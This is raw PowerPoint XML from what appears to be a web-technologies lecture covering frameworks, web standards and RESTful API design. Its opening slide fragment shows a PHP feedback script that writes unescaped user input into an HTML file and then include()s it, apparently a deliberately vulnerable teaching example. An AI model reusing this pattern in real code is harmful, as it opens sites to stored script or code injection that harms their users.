              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>feedback.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>", "a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>($file, "&lt;p&gt;$name said: $comment&lt;/p&gt;\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>($file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>include(”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>feedback.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;p&gt;And this is the end of it!&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35281606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Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web App Frameworks provide support for the rapid development of web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be based on existing web servers or might provide a complete environment (including the server implementation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often based on the Model-View-Controller architectural pattern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide automated translation of objects to/from databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide templates for the generation of dynamic pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3890559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Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6923579" y="2585397"/>
            <a:ext cx="4071510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>trends.builtwith.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2AFA23-9740-794A-B120-58ADCC121F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773936" y="956579"/>
            <a:ext cx="5042023" cy="3849239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290598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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Standards and Technologies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716805" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>HTTP 1.0, HTTP 1.1, HTTP/2, HTTP/3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SSL/TLS, Socks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>URIs, URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>HTML 5, XML, XHTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Cascading Style Sheets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>JavaScript, TypeScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>DOM, BOM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CGI, Active Server Pages, Node.js, PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1918645675"/>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Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3715911" y="4912668"/>
            <a:ext cx="5428089" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>www.statista.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/statistics/1124699/worldwide-developer-survey-most-used-frameworks-web/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A graph with blue and white bars&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A799B0-2F6E-53A8-550D-E5B255D3F0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308996" y="1063229"/>
            <a:ext cx="5662741" cy="3709019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31857025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F5C86D-F689-21A6-08F3-4560CA38D654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RESTful APIs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF89CDC-6F44-1318-025E-DEAE74DDB4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Representational State Transfer defines an architectural style for invoking services on a web server and create, update, or delete resources defined by URIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stateless: Every client request should be serviceable in isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cacheable: Interactions should be cached for improved performance whenever possible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layered: Services can be accessed without worrying about the details of the intermediate delivery steps (e.g., proxies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The body of a message contains a representation of the resource (usually as JSON or XML)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The resource representation should contain link to any other resource needed for completing a task</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1747192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51A4-179E-091E-F98F-26ED580B6F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example of Resource</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8F45C3-AA76-332C-486B-2F7E3B8FA445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ "id": 123,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"title": "What is REST",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"content": "REST is an architectural style for building web services...",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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>published_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "2023-11-04T14:30:00Z",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"author": {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"id": 456,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"name": "John Doe",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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/authors/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>johndoe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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"comments": {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"count": 5,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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>comments_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>": "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/posts/123/comments"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"self": {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"link": "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/posts/123" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74705770-2958-8381-4EE7-7A6C08399B16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7601590" y="4829351"/>
            <a:ext cx="1542410" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>restfulapi.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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41212283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4A8E-98EC-A455-A2F3-85C376A3D103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifying Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38ECFCA-54A0-0A0F-9AB1-B1DC12F7B4E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hierarchical Relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/managed-devices </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/managed-devices/{id} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/managed-devices/{id}/scripts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/managed-devices/{id}/scripts/{id}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/managed-devices </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>managed-devices?region</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=USA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>managed-devices?region</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>USA&amp;brand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=XYZ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/device-management/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>managed-devices?region</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>USA&amp;brand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XYZ&amp;sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=installation-date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
